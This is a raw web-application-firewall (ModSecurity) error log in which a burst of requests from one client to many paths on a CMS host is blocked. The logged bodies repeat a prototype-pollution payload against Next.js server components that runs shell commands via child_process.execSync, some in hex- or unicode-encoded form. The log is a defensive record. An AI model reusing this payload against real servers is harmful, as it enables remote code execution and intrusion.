{\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('6563686f2024282834312a3237312929','hex').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/account"] [unique_id "adJm1pc83uMXRUE9zvQTmwAAAcU"] [Sun Apr 05 15:42:46.415022 2026] [:error] [pid 23077:tid 23086] [client 172.94.9.253:37942] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/post"] [unique_id "adJm1pc83uMXRUE9zvQTmgAAAcM"] [Sun Apr 05 15:42:46.415085 2026] [:error] [pid 23077:tid 23090] [client 172.94.9.253:37886] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/de"] [unique_id "adJm1pc83uMXRUE9zvQTmQAAAcc"] [Sun Apr 05 15:42:46.416244 2026] [:error] [pid 13019:tid 13246] [client 172.94.9.253:37910] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/settings"] [unique_id "adJm1rxQSOrq_iRTM7dq2gAAAQY"] [Sun Apr 05 15:42:46.419121 2026] [:error] [pid 23077:tid 23096] [client 172.94.9.253:37958] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/users"] [unique_id "adJm1pc83uMXRUE9zvQTnQAAAc0"] [Sun Apr 05 15:42:46.419208 2026] [:error] [pid 13019:tid 13251] [client 172.94.9.253:37924] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/profile"] [unique_id "adJm1rxQSOrq_iRTM7dq2wAAAQs"] [Sun Apr 05 15:42:46.428253 2026] [:error] [pid 1503:tid 1510] [client 172.94.9.253:37954] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/home"] [unique_id "adJm1kI7AjfUQYCN-J7D9gAAAME"] [Sun Apr 05 15:42:46.463558 2026] [:error] [pid 23077:tid 23094] [client 172.94.9.253:37930] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/signin"] [unique_id "adJm1pc83uMXRUE9zvQTnAAAAcs"] [Sun Apr 05 15:42:46.528847 2026] [:error] [pid 23077:tid 23083] [client 172.94.9.253:38006] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:\\x5cu005f\\x5cu005f\\x5cu0070\\x5cu0072\\x5cu006f\\x5cu0074\\x5cu006f\\x5cu005f\\x5cu005f:\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22\\x5cu0072\\x5cu0065\\x5cu0073\\x5cu006f\\x5cu006c\\x5cu0076\\x5cu0065\\x5cu0064\\x5cu005f\\x5cu006d\\x5cu006f\\x5cu0064\\x5cu0065\\x5cu006c\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu0..."] [sever [hostname "cms.dev-unit.com"] [uri "/profile"] [unique_id "adJm1pc83uMXRUE9zvQTnwAAAcA"] [Sun Apr 05 15:42:46.561458 2026] [:error] [pid 23077:tid 23089] [client 172.94.9.253:38010] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/posts"] [unique_id "adJm1pc83uMXRUE9zvQToAAAAcY"] [Sun Apr 05 15:42:46.562235 2026] [:error] [pid 13019:tid 13259] [client 172.94.9.253:38020] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/profile"] [unique_id "adJm1rxQSOrq_iRTM7dq3QAAARM"] [Sun Apr 05 15:42:46.563172 2026] [:error] [pid 22788:tid 22810] [client 172.94.9.253:38022] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/post"] [unique_id "adJm1iLbhFL16Wsx-C9DEAAAAZQ"] [Sun Apr 05 15:42:46.564637 2026] [:error] [pid 13019:tid 13249] [client 172.94.9.253:38072] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/signup"] [unique_id "adJm1rxQSOrq_iRTM7dq3AAAAQk"] [Sun Apr 05 15:42:46.600258 2026] [:error] [pid 13019:tid 13252] [client 172.94.9.253:38038] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/trpc"] [unique_id "adJm1rxQSOrq_iRTM7dq3gAAAQw"] [Sun Apr 05 15:42:46.601381 2026] [:error] [pid 13019:tid 13258] [client 172.94.9.253:38056] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/api"] [unique_id "adJm1rxQSOrq_iRTM7dq3wAAARI"] [Sun Apr 05 15:42:46.619358 2026] [:error] [pid 23077:tid 23095] [client 172.94.9.253:38088] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/settings"] [unique_id "adJm1pc83uMXRUE9zvQTogAAAcw"] [Sun Apr 05 15:42:46.622757 2026] [:error] [pid 1309:tid 1394] [client 172.94.9.253:38052] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "adJm1j-XKUNJEHmNu6G70AAAAJc"] [Sun Apr 05 15:42:46.641642 2026] [:error] [pid 13019:tid 13247] [client 172.94.9.253:37990] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/app"] [unique_id "adJm1rxQSOrq_iRTM7dq4AAAAQc"] [Sun Apr 05 15:42:46.657279 2026] [:error] [pid 1309:tid 1389] [client 172.94.9.253:38110] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/account"] [unique_id "adJm1j-XKUNJEHmNu6G70QAAAJI"] [Sun Apr 05 15:42:46.681689 2026] [:error] [pid 1503:tid 1516] [client 172.94.9.253:38124] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: 